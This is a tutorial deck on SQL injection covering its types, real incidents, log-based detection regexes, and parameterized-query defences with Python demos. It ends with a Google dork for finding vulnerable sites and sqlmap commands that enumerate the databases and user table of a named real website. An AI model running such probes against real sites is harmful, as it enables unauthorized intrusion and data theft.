SQL INJECTION
AJU MATHEW THOMAS

What is SQL Injection
• A technique that takes advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database.
• The basic objective is to pull the database information that sits behind a web server, such as usernames, passwords, admin details, and other relevant information related to the website.
• It is an exploit that a hacker uses to gather information from a database.

Overview – Cont.
• Hackers can use SQL injection to add, modify, and delete records in the database.
• Gives an adversary complete control over the web application database.
• It can affect any web application that uses an SQL database, such as MySQL, Oracle, SQL Server, etc.
• Considered one of the most prevalent and most dangerous web application vulnerabilities.
• It is also listed as one of the top ten web application vulnerabilities in the OWASP Top Ten.

Injection Mechanism
• Injection mechanisms are mainly of two types: (i) first order injection (ii) second order injection.
• First order injection → (i) Injection through user inputs (ii) Injection through cookies (iii) Injection through server variables.
• First order injection → The application processes the input and causes the attacker’s injected SQL query to execute.
• Second order injection → The application stores the user input for future use and responds to the request. When the attacker submits a second request, the application retrieves the stored input and processes it, causing the attacker’s injected SQL query to execute.
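
The second order flow described above, as an added example that is not part of the original slides: the first request stores the input safely, and the flaw only appears when a later request concatenates the stored value. The `users` table, the function names and the sample user name are assumptions made for the illustration, run against an in-memory SQLite database.

```python
import sqlite3

# Constructed sample input: a user name that closes a string literal and comments out
# whatever follows it in a statement it is concatenated into.
CRAFTED_NAME = "admin'--"

def make_db():
    """In-memory database with one pre-existing (constructed) account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    db.execute("INSERT INTO users (name, password) VALUES ('admin', 'admin-secret')")
    return db

def register(db, name, password):
    """First request: the input is stored with bound parameters, so nothing executes yet."""
    return db.execute(
        "INSERT INTO users (name, password) VALUES (?, ?)", (name, password)
    ).lastrowid

def stored_name(db, user_id):
    return db.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()[0]

def password_of(db, name):
    return db.execute("SELECT password FROM users WHERE name = ?", (name,)).fetchone()[0]

def change_password_vulnerable(db, user_id, new_password):
    """Second request, vulnerable: the stored name is trusted and concatenated."""
    sql = "UPDATE users SET password = ? WHERE name = '" + stored_name(db, user_id) + "'"
    db.execute(sql, (new_password,))

def change_password_hardened(db, user_id, new_password):
    """Second request, hardened: data read back from the database is bound as well."""
    db.execute(
        "UPDATE users SET password = ? WHERE name = ?",
        (new_password, stored_name(db, user_id)),
    )

def run(change_password):
    """Register the crafted name, change its password, report who was actually affected."""
    db = make_db()
    user_id = register(db, CRAFTED_NAME, "first")
    change_password(db, user_id, "changed")
    return {"admin": password_of(db, "admin"), "crafted": password_of(db, CRAFTED_NAME)}

if __name__ == "__main__":
    print("vulnerable:", run(change_password_vulnerable))
    print("hardened:  ", run(change_password_hardened))
```

In the vulnerable flow the password change lands on the pre-existing `admin` row; in the hardened flow it lands only on the account that requested it.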

History of SQLI
• SQL injection was first discovered in 1998.
• Jeff Forristal was one of the first people to ever document SQL injection.
• A few exploits recorded in the past:
(1) CVE-2019-1010248 – Synetics GmbH i-doit 1.12 and earlier was affected by SQL injection. The impact was unauthenticated access to the MySQL database. The component was a web login form. The attack vector: sending a malicious HTTP POST request.
(2) CVE-2019-1010259 – SaltStack Salt 2018.3, 2019.2 – An attacker could escalate privileges on a MySQL server deployed by a cloud server. It leads to RCE.

History of SQLI Attacks
• SQLI attacks have been predominant since their inception, and many past attacks due to SQLI caused huge losses to many organizations.
• Starbucks Attack Aug 2019 – A critical SQL injection vulnerability existed on a Starbucks enterprise database that may have exposed internal financial and accounting records. The vulnerability was discovered through a vulnerability discovery program run by HackerOne on behalf of Starbucks. The vulnerability could give access to taxes, receipts, payroll data and all other information held on an exposed accounting database.

History of SQLI Attacks (Cont.)
• Sony Music Attacks May 2011 - A group of hackers used SQL injection attack techniques to expose sensitive user records on Sony Music Japan and also on Sony BMG Greece on May 21, 2011.
• There were two PHP pages that were vulnerable to SQL injection on the Sony Music Japan site.
• Data leaked from the attack on Sony BMG Greece included usernames, real names, and email addresses of users registered on the SonyMusic.gr site. This attack appears to have used an automated SQL injection tool to find the flaw.
• The database information that was published from Sony Music Japan did not contain names, passwords or other personally identifiable information.

History of SQLI Attacks (Cont.)
• An SQL injection attack was used to steal the personal details of 156,959 customers from the servers of British telecommunications company TalkTalk, exploiting a vulnerability in a legacy web portal.

Types of SQL Injections
• SQL injections typically fall under three categories: (i) In-band SQLi (Classic) (ii) Inferential SQLi (Blind) (iii) Out-of-band SQLi.
• In-band SQLi → The attacker uses the same channel of communication to launch attacks and to gather results. The two subvariants are:
o Error-based SQLi – Performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.
o Union-based SQLi – Uses the UNION SQL operator, which fuses multiple SELECT statements generated by the database to get a single HTTP response.

Types of SQL Injections
• Blind SQLi → Used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker.
• The vulnerable page may not be one that displays data, but it will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page.
• Out-of-band SQLi → This attack can be used only when certain features are enabled on the database server used by the web application. Out-of-band SQLi is performed when the attacker can’t use the same channel to launch the attack and gather information, or when a server is too slow or unstable for these actions to be performed.

Detection of SQL Injection
• Detection is an important component of mitigating the risk of SQL injection attacks.
• A WAF (Web Application Firewall) can detect and block basic SQL injection attacks.
• An IDS (both network-based and host-based) can be tuned to detect SQL injection attacks.
• Network-based IDSes can monitor all connections to your database server and can flag suspicious activity.
• Host-based IDSes can monitor web server logs and alert when something strange happens.
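
One way a host-based check over web server logs can work, as an added example that is not part of the original slides: each query parameter is decoded (including repeated percent-encoding), scored against a few heuristic rules, and reported once the score reaches a threshold. The log lines are constructed, and the rule names, weights and threshold are assumptions to be tuned per application.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (Common Log Format); 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2024:10:01:02 +0000] "GET /item.php?id=7 HTTP/1.1" 200 512',
    '192.0.2.11 - - [12/Mar/2024:10:01:05 +0000] "GET /item.php?id=7%27 HTTP/1.1" 500 130',
    '192.0.2.11 - - [12/Mar/2024:10:01:09 +0000] "GET /item.php?id=7+UNION+SELECT+1,2,3 HTTP/1.1" 200 498',
    '192.0.2.11 - - [12/Mar/2024:10:01:14 +0000] "GET /item.php?id=7%2527%2520OR%25201%253D1 HTTP/1.1" 200 9120',
    '192.0.2.12 - - [12/Mar/2024:10:02:40 +0000] "GET /search.php?q=o%27reilly+books HTTP/1.1" 200 2048',
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+')

# (rule name, pattern applied to the decoded, lower-cased value, weight)
RULES = [
    ("union-select", re.compile(r"\bunion\b.{0,40}\bselect\b"), 3),
    ("tautology", re.compile(r"\b(?:or|and)\b\s+'?(\w+)'?\s*=\s*'?\1\b"), 3),
    ("sql-comment", re.compile(r"--|/\*"), 1),
]
ALERT_THRESHOLD = 2  # a lone apostrophe (score 1) is common in legitimate input

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded values are still inspected."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def score_value(value, status):
    """Return (score, matched rule names) for one query-parameter value."""
    text = fully_decode(value).lower()
    hits = [(name, weight) for name, rx, weight in RULES if rx.search(text)]
    if text.count("'") % 2 == 1:
        hits.append(("stray-quote", 1))
    if hits and status >= 500:
        # A suspicious value that also broke the page is a stronger signal.
        hits.append(("server-error", 1))
    return sum(w for _, w in hits), [n for n, _ in hits]

def scan(lines):
    """Parse log lines and return one alert per parameter that reaches the threshold."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        # parse_qsl performs the first round of URL decoding.
        for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            score, rules = score_value(value, status)
            if score >= ALERT_THRESHOLD:
                alerts.append({"ip": ip, "param": param, "score": score, "rules": rules})
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The search for "o'reilly books" scores below the threshold, which shows why pattern rules need weighting: signature matching alone produces both false positives and misses, so it complements rather than replaces fixing the query code.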

Prevention of SQL Injection Attacks
• Sanitize database inputs. Any input to the web application database should be considered untrustworthy and should be dealt with accordingly.
• Developers must follow the principle of whitelisting for input validation.
• Use ‘prepared’ statements with parameterized queries, and escape all user-supplied input.
• Limit the account privileges of the database user. Also give the web application the minimum privileges it needs to run.
• Stored procedures can also make SQLI a lot harder.
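
How whitelisting and parameterized queries fit together, as an added example that is not part of the original slides: values are bound as parameters, while the parts of a statement that cannot be bound (column names, sort direction) are mapped through an allow-list. The `products` table, the function names and the sample inputs are assumptions, run against an in-memory SQLite database.

```python
import sqlite3

# Allow-lists: request value -> SQL fragment that is safe to place in the statement.
ALLOWED_SORT = {"name": "name", "price": "price"}
ALLOWED_DIR = {"asc": "ASC", "desc": "DESC"}

def make_db():
    """In-memory catalogue (constructed data); 'hidden' rows must never be listed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL, hidden INTEGER);
        INSERT INTO products (name, price, hidden) VALUES
            ('kettle', 25.0, 0), ('toaster', 40.0, 0), ('prototype', 999.0, 1);
    """)
    return db

def search_vulnerable(db, term):
    # The input is pasted into the SQL text, so it can change the statement's structure.
    sql = "SELECT name FROM products WHERE hidden = 0 AND name LIKE '%" + term + "%'"
    return [row[0] for row in db.execute(sql)]

def search_hardened(db, term, sort="name", direction="asc"):
    # Identifiers and keywords cannot be bound as parameters: validate against an allow-list.
    if sort not in ALLOWED_SORT or direction not in ALLOWED_DIR:
        raise ValueError("unsupported sort option")
    sql = (
        "SELECT name FROM products WHERE hidden = 0 AND name LIKE ? ESCAPE '\\' "
        f"ORDER BY {ALLOWED_SORT[sort]} {ALLOWED_DIR[direction]}"
    )
    # The value is bound; LIKE wildcards in it are escaped so they match literally.
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return [row[0] for row in db.execute(sql, ("%" + escaped + "%",))]

if __name__ == "__main__":
    db = make_db()
    crafted = "' OR 1=1 --"  # constructed input that rewrites the WHERE clause
    print("vulnerable:", search_vulnerable(db, crafted))
    print("hardened:  ", search_hardened(db, crafted))
    print("normal use:", search_hardened(db, "e", sort="price", direction="desc"))
```

With the concatenated query the crafted term returns the hidden row as well; with the bound query it is treated as a literal search string and matches nothing.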

SQL Injection Attacks Using sqlmap
• sqlmap → An open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
• PHP ID vulnerability → Websites with the PHP ID vulnerability are more prone to SQL injection attacks. Search engines like Google can index websites that contain the string “php?id=1” in the URL. Attackers can make use of this vulnerability to perform SQLI attacks.
• Type the following line in Google search → “inurl: php?id=1”. It will list all URLs that contain the above phrase.
• A website can be checked for SQLI vulnerability by appending a single quote (') at the end of the URL. If the content changes, it indicates that the site is prone to SQL injection attacks.

Working of sqlmap
• Open ‘sqlmap’ in Terminal and type the command “sqlmap -h” to see the list of available options.
• Type the command → sqlmap -u http://www.pha.org.pk/sro_list.php?catid=1 --dbs
• Here -u → URL of the website
• --dbs → To list all the available databases related to the website
• To get the tables → sqlmap -u http://www.pha.org.pk/sro_list.php?catid=1 -D pha --tables
• To get the columns → sqlmap -u http://www.pha.org.pk/sro_list.php?catid=1 -D pha -T cp_user --columns
